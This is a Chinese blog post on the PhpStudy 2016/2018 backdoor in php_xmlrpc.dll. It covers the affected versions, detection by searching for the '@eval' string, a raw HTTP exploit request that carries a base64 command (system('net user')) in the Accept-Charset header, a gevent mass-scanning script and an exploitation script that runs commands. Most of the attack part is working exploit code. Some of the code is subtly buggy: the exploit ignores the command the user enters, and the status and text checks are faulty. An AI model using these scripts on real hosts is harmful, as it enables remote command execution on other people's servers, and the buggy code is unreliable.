python phpstudy_PhpStudy后门漏洞

最新推荐文章于 2023-08-16 10:49:57 发布
最新推荐文章于 2023-08-16 10:49:57 发布
阅读量163 收藏
点赞数
文章标签: python phpstudy

1.影响版本

phpstudy 2016版php-5.2.17

phpstudy 2016版php-5.4.45

phpstudy 2018版php-5.2.17

phpstudy 2018版php-5.4.45

2.后门检测分析

1)通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中

(1)phpStudy2016路径:

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

(2)phpStudy2018路径:

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

2)用notepad打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在

3.漏洞复现

1)启动phpstudy 2018版php-5.4.45

2)访问http://127.0.0.1/index.php

(1)按照下面漏洞exp,将Accept-Charset字段修改为base64加密的命令“phpinfo();”

(2)将Accept-Charset字段修改为base64加密的命令“echo system("net user");”

4.后门exp

GET /index.php HTTP/1.1

Host: 127.0.0.1

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Encoding: gzip,deflate

Accept-Charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Language: zh-CN,zh;q=0.9

Connection: close

5.后门检测脚本

# !/usr/bin/env python

# -*- coding:utf-8 -*-

import gevent

from gevent import monkey

gevent.monkey.patch_all()

import requests as rq

def file_read(file_name="url.txt"):

with open(file_name, "r") as f:

return [i.replace("\n", "") for i in f.readlines()]

def check(url):

'''

if "http://" or "https://" not in url:

url = "https://" + url

'''

headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',

'Sec-Fetch-Mode': 'navigate',

'Sec-Fetch-User': '?1',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',

'Sec-Fetch-Site': 'none',

'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==', # 输出 eeSzxu92nIDAb

'Accept-Encoding': 'gzip,deflate',

'Accept-Language': 'zh-CN,zh;q=0.9',

}

try:

res = rq.get(url, headers=headers, timeout=20)

if res.status_code == 200:

if res.text.find('eeSzxu92nIDAb'):

print("[存在漏洞] " + url)

except:

print("[超时] " + url)

if __name__ == '__main__':

print("phpStudy 批量检测 (需要 gevent,requests 库)")

print("使用之前,请将URL保存为 url.txt 放置此程序同目录下")

input("任意按键开始执行..")

tasks = [gevent.spawn(check, url) for url in file_read()]

print("正在执行...请等候")

gevent.joinall(tasks)

wait = input("执行完毕 任意键退出...")

6.后门利用脚本

# !/usr/bin/env python

# -*- coding:utf-8 -*-

import requests

import base64

def backdoor(url, command="system('calc.exe');"):

headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',

'Sec-Fetch-Mode': 'navigate',

'Sec-Fetch-User': '?1',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',

'Sec-Fetch-Site': 'none',

'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==',

'Accept-Encoding': 'gzip,deflate',

'Accept-Language': 'zh-CN,zh;q=0.9',

}

command = base64.b64encode(command.encode('utf-8'))

command = str(command, 'utf-8')

result = requests.get(url, headers=headers, verify=False)

if result.status_code == "200":

print("执行完成")

a = input("任意键退出...")

url = input("输入URL(例如:http://127.0.0.1:228/xx.php)\n")

command = input("输入命令 默认为 system('calc.exe'); (不想输入直接回车)\n")

backdoor(url, command)

原文链接:https://blog.csdn.net/qq_36197704/article/details/108471389

weixin_39520204
关注
pandas正则表达式,提取汉字、字母、数字、罗马数字
weixin_46276803的博客
03-09 1万+
仅提取汉字 str_stationname = re.findall('[\u4e00-\u9fa5]+',str) 提取英文字母和数字,要匹配什么,在后面加上就行 '[\a-zA-Z0-9ⅠⅡⅢⅣⅤⅥⅦⅧⅨⅩ]+' 附:https://www.cnblogs.com/BluceLee/p/11419302.html 史上最全的正则表达式-匹配中英文、字母和数字 在做项目的过程中,使用正则表达...
python正则表达式详解 pandas_【python】正则表达式的分组及在pandas中的实用操作...
weixin_30152861的博客
02-21 4197
正则表达式的分组及在pandas中的实用操作1. 正则表达式分组1.1 分组的模式1.2 分组的实际操作1.2.1 邮箱号码匹配1.2.2 标签信息匹配2. pandas中的应用操作2.1 导入库,读取文件数据,并输出指定的字段2.2 提取数据,创建新字段3. 小结之前的博客中已经讲解了相关的正则表达式的一些基础的内容,可见:正则1,正则2,正则3,正则4这里补充一下正则表达式分组的相关内容以及结...
python正则表达式详解 pandas_python学习-pandas系列
weixin_39629947的博客
11-28 300
# 首先 准备生成一个关于基金数据的Seriesdef get_fund_series():import requestsfrom dateutil import parserimport datetimeheaders = {'Connection': 'keep-alive','Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '...
Python案例|Pandas正则表达式
最新发布
不断学习,不断进步,提高自己
08-16 6074
字符串的处理在数据清洗中占比很大。也就是说,很多不规则的数据处理都是在对字符串进行处理。Excel提供了拆分、提取、查找和替换等对字符串处理的技术。在Pandas中同样提供了这些功能,并且在Pandas中还有正则表达式技术的加持,让其字符串处理能力更加强大。
python】正则表达式的分组及在pandas中的实用操作
lys_828的博客
05-23 2920
正则表达式的分组及在pandas中的实用操作1. 正则表达式分组1.1 分组的模式1.2 分组的实际操作1.2.1 邮箱号码匹配1.2.2 标签信息匹配2. pandas中的应用操作3. 小结 之前的博客中已经讲解了相关的正则表达式的一些基础的内容,可见:正则1,正则2,正则3,正则4 这里补充一下正则表达式分组的相关内容以及结合pandas使用时候的实际操作 1. 正则表达式分组 1.1 分组的模式 字符 功能 (ab) 将括号中的字符作为一个分组 \num 引用分组的num匹配到的字
Python脚本实现PHPstudy后门批量扫描与利用
weixin_42372877的博客
10-06 1805
前言: 北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控制,并大肆盗取账号密码、聊天记录、设备码类等敏感数据多达10万多组,非法牟利600多万元。 注:本文仅供学习参考,下文中提到的漏洞利用方法不得...
全国中职网络安全B模块之国赛题远程代码执行渗透测试 PHPstudy后门漏洞分析
web13618542420的博客
07-31 649
需要工具和环境的可以加群809706080,有什么不会的也可以在里面提问,我看到会第一时间回答。
phpstudy后门rce批量利用脚本的实现
10-15
【知识点详解】 本文主要探讨了如何实现针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。...通过学习这篇内容,读者不仅可以理解如何利用PHPStudy后门,还能学到Python编程、网络请求和安全测试的基础知识。
Phpstudy 隐藏后门远程代码执行
玄道的网安博客
05-20 3410
漏洞介绍 phpstudy 是一个php快速集成环境, 主要用于学习测试, 但是也有很多人为了方便行事就直接拿来部署服务器了 影响主件 phpstudy 漏洞指纹 phpstudy 探针 漏洞分析 phpStudy 后门分析 后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"; phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy
phpstudy后门-插件、环境、复现
MzHeader的博客
10-24 1560
1.1 后门检测 影响: phpstudy 2016 php5.4 phpstudy2018 php-5.2.17和php-5.4.45 位置: 通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlr...
phpStudy 探针 2014.zip
05-27
phpStudy集成最新的Apache Nginx IIS Lighttpd PHP MySQL phpMyAdmin SQL-Front Zend Loader,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序绿色小巧简易迷你,有专门的控制面板。总之学习PHP只需一个包。对学习PHP的新手来说,WINDOWS下环境配置是一件很困难的事;对老手来说也是一件烦琐的事。因此无论你是新手还是老手,该程序包都是一个不错的选择。
Python 数量词(*+?)的贪婪模式和非贪婪模式
houyanhua1的专栏
10-10 644
Python里数量词(*+?)默认是贪婪的(在少数语言里也可能是默认非贪婪),总是尝试匹配尽可能多的字符;非贪婪的则相反,总是尝试匹配尽可能少的字符。例如:正则表达式"ab*"如果用于查找"abbbc",将找到"abbb"。而如果使用非贪婪的数量词"ab*?",将找到"a"。 import re print(re.match(r"^(\d+)(0*)$","8848000").gro
pandas—字符串正则表达式
qq_45286306的博客
04-21 1612
字符串处理,使用正则表达式
python (numpy基础) (pandas基础)(正则表达式)
吕布_超的博客
01-12 2261
1.有时候对某个功能一时想不起来,这里对numpy做一个简单的记录。 摘自molearner numpy2.pandas 摘自molearner pandas3.python正则表达式 摘自funhacks
python正则表达式详解 pandas_Python/Pandas(十四)-字符串与正则-阿里云开发者社区...
weixin_39752434的博客
12-07 482
split拆分常和strip使用val='a,b,guido'val.split(',')['a', 'b', 'guido']pieces=[ x.strip() for x in val.split(',')]pieces['a', 'b', 'guido']'::'.join(pieces)'a::b::guido'first,second,third=piecesfirst+'::'+':...
python非法表达式_第010篇:正则表达式在Pandas中的应用
weixin_42396502的博客
01-05 287
# 导入pandas import pandas as pd数据如下:file_info = [ {'id': 'CCH204', 'email': 'cchippendale0@instagram.com', 'date': '06/07/8020', 'mac': 'BA:1C:99:10:4A:D3', 'file_name': 'TempusSemper.avi', ...
python正则表达式详解 pandas_正则表达式 - python pandas的sep参数问题
weixin_39801879的博客
11-28 861
问 题最近想学习利用python的pandas处理apache的大日志,从国外找了一篇文章链接描述,对方用的是sep正则表达式提取数据pd.read_csv(file_name, sep=r'\s(?=(?:[^"]*"[^"]*")*[^"]*$)(?![^\[]*\])', engine='python', na_values='-', header=None,usecols=[0, 3, ...
python正则表达式详解 pandas_python/pandas正则表达式re模块
weixin_39736379的博客
11-28 390
(?iLmsux)iLmsux每个字符代表一个匹配模式(?!abc)Abc, abc, ......(?#...)#之后的内容作为注释被忽略(?=...)之后的字符串内容需要匹配表达式,不消耗字符串内容a(?=d)后面是数字的a(?!...)之后的字符串内容需要不匹配表达式,不消耗字符串内容a(?!d)后面不是数字的a(?u"[u4e00-u9fa5]”3、re模块常用方法compile():编译...
使用Python Pandas 笔记(正则匹配输出一串数据中需要的部分)
KZJWD的博客
07-09 584
import pandas as pd #读取csv文件 pid = pd.read_csv(r'C:\Users\Administrator\Desktop\pid.csv') #正则匹配('网页'指列名为网页的列) pid_type=pid['网页'].str.extract(r'(?<=pid=)([0-9]+)') #合并列 pid = pd.concat([pid,pid_type],axis = 1) #修改列名 pid.columns=['网页','pid'] #输出.
PHPstudy后门漏洞利用详解
资源文件名为“PHPStudy_BackDoor_EXP PHPstudy后门利用脚本 (3).zip”,表明这是一系列脚本中的第三个版本。文件名中的数字“3”可能表示此版本在功能上相较于前两个版本有所改进或是针对新发现的漏洞进行了更新。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值